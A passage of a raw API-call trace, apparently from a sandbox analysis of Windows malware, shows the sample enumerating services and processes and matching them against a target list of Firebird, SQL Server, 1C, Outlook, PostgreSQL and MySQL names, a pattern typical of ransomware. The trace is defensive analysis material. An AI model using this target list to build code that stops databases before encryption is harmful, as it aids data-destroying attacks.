hSnapshot=0x204, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0045.112] CloseHandle (hObject=0x204) returned 1 [0045.112] Sleep (dwMilliseconds=0x1f4) [0045.812] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x664450 [0045.812] EnumServicesStatusExW (in: hSCManager=0x664450, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0045.812] GetLastError () returned 0xea [0045.812] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x39606f0 [0045.812] EnumServicesStatusExW (in: hSCManager=0x664450, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x39606f0, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x39606f0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0045.813] CloseServiceHandle (hSCObject=0x664450) returned 1 [0045.813] lstrlenW (lpString="Appinfo") returned 7 [0045.813] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0045.813] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0045.813] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0045.813] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0045.813] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0045.813] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0045.813] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0045.813] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0045.813] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0045.813] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0045.813] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0045.813] lstrlenW (lpString="AudioSrv") returned 8 [0045.813] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0045.813] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0045.813] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0045.813] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0045.814] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0045.814] lstrlenW (lpString="BFE") returned 3 [0045.814] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0045.814] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0045.814] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0045.814] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0045.814] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0045.814] lstrlenW (lpString="CryptSvc") returned 8 [0045.814] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0045.814] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0045.814] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0045.814] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0045.814] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0045.814] lstrlenW (lpString="CscService") returned 10 [0045.814] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0045.814] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0045.814] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0045.814] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0045.814] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0045.814] lstrlenW (lpString="DcomLaunch") returned 10 [0045.814] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0045.814] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0045.814] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0045.814] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0045.814] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0045.814] lstrlenW (lpString="Dhcp") returned 4 [0045.814] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0045.814] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0045.814] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0045.814] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0045.814] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0045.814] lstrlenW (lpString="Dnscache") returned 8 [0045.814] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0045.814] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0045.814] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0045.814] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0045.814] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0045.814] lstrlenW (lpString="DPS") returned 3 [0045.815] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0045.815] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0045.815] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0045.815] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0045.815] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0045.815] lstrlenW (lpString="eventlog") returned 8 [0045.815] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0045.815] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0045.815] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0045.815] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0045.815] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0045.815] lstrlenW (lpString="EventSystem") returned 11 [0045.815] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0045.815] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0045.815] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0045.815] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0045.815] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0045.815] lstrlenW (lpString="gpsvc") returned 5 [0045.815] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0045.815] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0045.815] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0045.815] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0045.815] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0045.815] lstrlenW (lpString="iphlpsvc") returned 8 [0045.815] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0045.815] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0045.815] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0045.815] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0045.815] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0045.815] lstrlenW (lpString="LanmanServer") returned 12 [0045.815] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0045.815] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0045.815] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0045.815] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0045.815] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0045.815] lstrlenW (lpString="LanmanWorkstation") returned 17 [0045.815] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0045.815] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0045.815] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0045.816] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0045.816] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0045.816] lstrlenW (lpString="lmhosts") returned 7 [0045.816] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0045.816] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0045.816] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0045.816] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0045.816] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0045.816] lstrlenW (lpString="MMCSS") returned 5 [0045.816] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0045.816] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0045.816] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0045.816] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0045.816] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0045.816] lstrlenW (lpString="MpsSvc") returned 6 [0045.816] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0045.816] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0045.816] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0045.816] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0045.816] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0045.816] lstrlenW (lpString="Netman") returned 6 [0045.816] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0045.816] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0045.816] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0045.816] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0045.816] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0045.816] lstrlenW (lpString="netprofm") returned 8 [0045.816] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0045.816] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0045.816] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0045.816] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0045.816] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0045.816] lstrlenW (lpString="NlaSvc") returned 6 [0045.816] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0045.816] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0045.816] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0045.817] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0045.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0045.817] lstrlenW (lpString="nsi") returned 3 [0045.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0045.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0045.817] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0045.817] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0045.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0045.817] lstrlenW (lpString="PcaSvc") returned 6 [0045.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0045.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0045.817] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0045.817] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0045.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0045.817] lstrlenW (lpString="PlugPlay") returned 8 [0045.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0045.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0045.817] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0045.817] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0045.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0045.817] lstrlenW (lpString="Power") returned 5 [0045.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0045.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0045.817] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0045.817] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0045.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0045.817] lstrlenW (lpString="ProfSvc") returned 7 [0045.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0045.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0045.817] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0045.817] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0045.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0045.817] lstrlenW (lpString="RpcEptMapper") returned 12 [0045.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0045.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0045.818] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0045.818] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0045.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0045.818] lstrlenW (lpString="RpcSs") returned 5 [0045.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0045.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0045.818] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0045.818] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0045.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0045.818] lstrlenW (lpString="SamSs") returned 5 [0045.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0045.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0045.818] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0045.818] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0045.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0045.818] lstrlenW (lpString="Schedule") returned 8 [0045.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0045.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0045.818] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0045.818] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0045.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0045.818] lstrlenW (lpString="SENS") returned 4 [0045.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0045.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0045.818] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0045.818] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0045.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0045.818] lstrlenW (lpString="ShellHWDetection") returned 16 [0045.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0045.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0045.818] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0045.818] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0045.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0045.818] lstrlenW (lpString="Spooler") returned 7 [0045.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0045.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0045.818] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0045.818] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0045.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0045.819] lstrlenW (lpString="swprv") returned 5 [0045.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0045.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0045.819] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0045.819] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0045.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0045.819] lstrlenW (lpString="SysMain") returned 7 [0045.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0045.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0045.819] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0045.819] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0045.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0045.819] lstrlenW (lpString="Themes") returned 6 [0045.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0045.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0045.819] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0045.819] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0045.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0045.819] lstrlenW (lpString="TrkWks") returned 6 [0045.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0045.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0045.819] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0045.819] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0045.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0045.819] lstrlenW (lpString="UxSms") returned 5 [0045.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0045.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0045.819] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0045.819] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0045.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0045.819] lstrlenW (lpString="VSS") returned 3 [0045.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0045.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0045.819] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0045.819] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0045.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0045.819] lstrlenW (lpString="WdiServiceHost") returned 14 [0045.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0045.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0045.820] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0045.820] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0045.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0045.820] lstrlenW (lpString="WdiSystemHost") returned 13 [0045.820] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0045.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0045.820] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0045.820] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0045.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0045.820] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0045.820] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0045.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0045.820] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0045.820] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0045.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0045.820] lstrlenW (lpString="Winmgmt") returned 7 [0045.820] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0045.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0045.820] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0045.820] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0045.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0045.820] lstrlenW (lpString="WPDBusEnum") returned 10 [0045.820] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0045.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0045.820] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0045.820] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0045.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0045.820] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39606f0 | out: hHeap=0x570000) returned 1 [0045.820] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0045.823] Process32FirstW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0045.823] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0045.824] lstrlenW (lpString="System") returned 6 [0045.824] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0045.824] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0045.824] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0045.824] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0045.824] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0045.824] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0045.824] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0045.824] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0045.825] lstrlenW (lpString="smss.exe") returned 8 [0045.825] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0045.825] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0045.825] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0045.825] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0045.825] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0045.825] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0045.825] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0045.825] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.826] lstrlenW (lpString="csrss.exe") returned 9 [0045.826] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0045.826] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0045.826] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0045.826] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0045.826] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0045.826] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0045.826] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0045.826] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0045.827] lstrlenW (lpString="wininit.exe") returned 11 [0045.827] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0045.827] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0045.827] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0045.827] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, 